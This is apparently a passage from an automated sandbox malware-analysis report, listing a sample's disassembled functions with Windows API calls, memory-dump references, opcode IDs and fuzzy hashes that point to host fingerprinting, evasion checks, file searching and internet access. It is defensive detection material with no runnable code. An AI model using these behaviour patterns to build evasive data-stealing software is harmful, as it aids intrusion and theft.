                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00414400 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocComputerNameProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 4203777966-0
                                                                                                      • Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                      • Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
                                                                                                      • Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                      • Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004010D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                      • VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                      • ExitProcess.KERNEL32 ref: 00401103
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1103761159-0
                                                                                                      • Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                      • Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
                                                                                                      • Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                      • Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004119B0 Relevance: 3.1, APIs: 2, Instructions: 66stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • strtok_s.MSVCRT ref: 004119C8
                                                                                                        • Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
                                                                                                        • Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                      • strtok_s.MSVCRT ref: 00411A4D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: strtok_s$FileFindFirstwsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 3409980764-0
                                                                                                      • Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
                                                                                                      • Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
                                                                                                      • Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
                                                                                                      • Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004147C0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InfoSystemwsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 2452939696-0
                                                                                                      • Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                      • Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
                                                                                                      • Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                      • Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0040ACE0 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                        • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                        • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040B190
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040B1A4
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02DD4F80), ref: 00404ED9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 574041509-0
                                                                                                      • Opcode ID: 56f25529f5d2fe15761f66cdc0fa59a4b91effbd32d2972b1c0d5a2599f8e217
                                                                                                      • Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
                                                                                                      • Opcode Fuzzy Hash: 56f25529f5d2fe15761f66cdc0fa59a4b91effbd32d2972b1c0d5a2599f8e217
                                                                                                      • Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0040A6E0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040A95A
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040A96E
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02DD4F80), ref: 00404ED9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3635112192-0
                                                                                                      • Opcode ID: f86264bb006207cf30b24e074904da5c2b538c0f28fefb805e06bd21fcc2ffcf
                                                                                                      • Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
                                                                                                      • Opcode Fuzzy Hash: f86264bb006207cf30b24e074904da5c2b538c0f28fefb805e06bd21fcc2ffcf
                                                                                                      • Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0040AA20 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040AC1E
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040AC32
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02DD4F80), ref: 00404ED9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3635112192-0
                                                                                                      • Opcode ID: 7dadc5b4cd3413107dca7a81a3c4ca659646e7b67e58f26f151010d40cbba245
                                                                                                      • Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
                                                                                                      • Opcode Fuzzy Hash: 7dadc5b4cd3413107dca7a81a3c4ca659646e7b67e58f26f151010d40cbba245
                                                                                                      • Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00406050 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
                                                                                                      • VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                      • Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
                                                                                                      • Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                      • Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00401060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
                                                                                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 2087232378-0
                                                                                                      • Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                      • Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
                                                                                                      • Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                      • Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00415490 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: be0baeed0cddd4351448173c283cfc01bb64caa5fd23e79b8f8fa40c9ce29eef
                                                                                                      • Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
                                                                                                      • Opcode Fuzzy Hash: be0baeed0cddd4351448173c283cfc01bb64caa5fd23e79b8f8fa40c9ce29eef
                                                                                                      • Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004154E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FolderPathlstrcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1699248803-0
                                                                                                      • Opcode ID: c7c707a7e520d0d67f3c3eb60cec8b26d92ba5516e27f83f13e6734a7a38c3a4
                                                                                                      • Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
                                                                                                      • Opcode Fuzzy Hash: c7c707a7e520d0d67f3c3eb60cec8b26d92ba5516e27f83f13e6734a7a38c3a4
                                                                                                      • Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                        • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                        • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                        • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02DD51E0,004136EB,0041D6E3), ref: 004143CD
                                                                                                        • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                        • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                      • ExitProcess.KERNEL32 ref: 00401186
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 1004333139-0
                                                                                                      • Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                      • Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
                                                                                                      • Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                      • Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00414FF0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: malloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2803490479-0
                                                                                                      • Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                      • Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
                                                                                                      • Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                      • Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

